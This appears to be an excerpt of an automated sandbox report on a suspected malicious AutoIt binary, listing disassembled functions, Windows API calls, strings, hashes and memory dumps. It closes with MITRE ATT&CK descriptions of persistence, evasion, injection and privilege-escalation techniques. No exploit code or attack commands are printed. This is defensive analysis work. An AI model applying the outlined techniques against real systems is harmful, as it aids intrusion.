Instruction Fuzzy Hash: 7F11E675901614ABEF10DF98DD04F9E77B8AB06B50F040067ED01E72A6D3B4ED04CBA9

Function 00454D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00454DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00454E1E

Strings

<local>, xrefs: 00454DE6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
Instruction ID: a2b902033b2b272dcdd8de091da7bffdf87fca83f2330df1588581490dfa76f8
Opcode Fuzzy Hash: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
Instruction Fuzzy Hash: E511CE70501221BADB248F51CC89EFBFBA8FB4635AF10822BF9054A241D3785989D6F4

Function 0042A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004337A7
___raise_securityfailure.LIBCMT ref: 0043388E

Strings

(L, xrefs: 00433889

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (L
API String ID: 3761405300-64732604
Opcode ID: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
Instruction ID: 96f49d47f233934f97ff6fc98e2702f1e7ee9d77956f56a4b685f7c9de796b82
Opcode Fuzzy Hash: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
Instruction Fuzzy Hash: 6821F0B5580304DBE780DF59F985E513BB5BB48314F10983AE9098B3A1E3F4A990CF4D

Function 0045A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E
htons.WSOCK32(00000000,?,00000000), ref: 0045A88B

Strings

255.255.255.255, xrefs: 0045A866

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
Instruction ID: 33c0523eded20f95c2541e34a1306b90952281821fa3487106dbad58873c6196
Opcode Fuzzy Hash: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
Instruction Fuzzy Hash: F7012674600304ABCB10EF68D886FADB364EF04315F10866BF912A73D2D739E819875A

Function 0043B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0043B7EF

Strings

ListBox, xrefs: 0043B7B9
ComboBox, xrefs: 0043B78B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 24ba98f40b48ac42636505f46d85276ec0c8781495c614b1d77dab7513cfc060
Instruction ID: faa06fab09b860605fa71cac64a851d916af7b13232032877203d1f3c0118a4b
Opcode Fuzzy Hash: 24ba98f40b48ac42636505f46d85276ec0c8781495c614b1d77dab7513cfc060
Instruction Fuzzy Hash: 9601F571A00114EBCB04EBA4DC52AFE7369EF49354B10072EF461632D2EB78590887E8

Function 0043B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0043B6EB

Strings

ListBox, xrefs: 0043B6B5
ComboBox, xrefs: 0043B687

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: ca03a840547f1c015c86af6f08eb8a1e6fc3178739941f7e2508374bc1ffdbfa
Instruction ID: b8f5d47413315d950295729a5b1110aeefbe7e91dcf1101fa693de6a23fb402e
Opcode Fuzzy Hash: ca03a840547f1c015c86af6f08eb8a1e6fc3178739941f7e2508374bc1ffdbfa
Instruction Fuzzy Hash: F3014471A41104ABCB05EBA5D953BFF73A89F09344F10112EB502732D2DB685E1897FE

Function 0043B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0043B76C

Strings

ListBox, xrefs: 0043B738
ComboBox, xrefs: 0043B70A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 591c62a720fef4d19e6080732ce5aee36145cf349c47a4d09087dc556d413ce1
Instruction ID: c3be138fd8a8966307237f1d2d4df2bf089ee9f861b5d3441c339aeace00059b
Opcode Fuzzy Hash: 591c62a720fef4d19e6080732ce5aee36145cf349c47a4d09087dc556d413ce1
Instruction Fuzzy Hash: 2D018FB1A41104EACB00E7A4DA52BFE73A8DB49348F10012FB901B32D2DB685E0987FD

Function 00424D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00424D9E
__calloc_crt.LIBCMT ref: 00424DB7

Strings

"L, xrefs: 00424DCE

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __calloc_crt
String ID: "L
API String ID: 3494438863-1021959943
Opcode ID: 459589bf01f1e6131b3d3ec32ae4130910a5340231ecd4781b19d2833b58d21b
Instruction ID: eceeb894ac627c810ad756cc3828aaa3408dd9ea78c7f78f9365c7f2dbc213ef
Opcode Fuzzy Hash: 459589bf01f1e6131b3d3ec32ae4130910a5340231ecd4781b19d2833b58d21b
Instruction Fuzzy Hash: D1F028713183219AF3149F59BD40EA667D4E740724F50406FF201CA294EBF8C8818A9C

Function 00404024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048
EnumResourceNamesW.KERNEL32(00000000,0000000E,004467E9,00000063,00000000,75C10280,?,?,00403EE1,?,?,000000FF), ref: 004741B3

Strings

>@, xrefs: 00404028

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >@
API String ID: 1578290342-3542666865
Opcode ID: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
Instruction ID: e4973a436c4eec6c210a25eda4c59efc3669ea1aa6e7713dab2b8f7e5e7bc754
Opcode Fuzzy Hash: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
Instruction Fuzzy Hash: DDF0627164031077E2205B16EC4AFD63B59E746BB5F104526F314A61E1D3F49080879C

Function 00447744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00447762
_wcscmp.LIBCMT ref: 00447774

Strings

#32770, xrefs: 0044776E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
Instruction ID: 5da36549c17edabc345c5b580b635295ffd76962587edd0bfd7ecaf78b42af47
Opcode Fuzzy Hash: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
Instruction Fuzzy Hash: C8E09B7760422427D7109B96AC45EC7FB6CAB51764F01006BB905D3191E674A64187D8

Function 0043A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0043A63F

Part of subcall function 004213F1: _doexit.LIBCMT ref: 004213FB

Strings

Error allocating memory., xrefs: 0043A638
AutoIt, xrefs: 0043A633

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e245a1cd8275b0e963c3e698ad5fa9ef0fae7de9ffd2a558bfdf3f366fb760a5
Instruction ID: 5d97c885ed2fb4aad5e724718862caed6ad4245b0840fc8da154a937ba3d52f3
Opcode Fuzzy Hash: e245a1cd8275b0e963c3e698ad5fa9ef0fae7de9ffd2a558bfdf3f366fb760a5
Instruction Fuzzy Hash: 53D02B313C032833D21436993C17FCA36488B14B55F14043BBF0CA51E249EED58002ED

Function 004686CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686E2
PostMessageW.USER32(00000000), ref: 004686E9

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Strings

Shell_TrayWnd, xrefs: 004686DB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
Instruction ID: 13f6a2cf583bc8a725f1f575c1c2257464a34b3c5b58d174a526da678b5d1d8b
Opcode Fuzzy Hash: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
Instruction Fuzzy Hash: 04D0C9317863287BF26467719C0BFCA6B589B04B21F100D2AB645AA1D0CAA8A940876D

Function 00468698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004686B5

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Strings

Shell_TrayWnd, xrefs: 0046869B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
Instruction ID: 5327e4fa2a42480748bb7cc66d897ba954c2bddabe160150f35467a3ae9de0ec
Opcode Fuzzy Hash: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
Instruction Fuzzy Hash: D7D0C931785328B7E26467719C0BFDA6B589B04B21F100D2AB649AA1D0CAA8A9408768

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
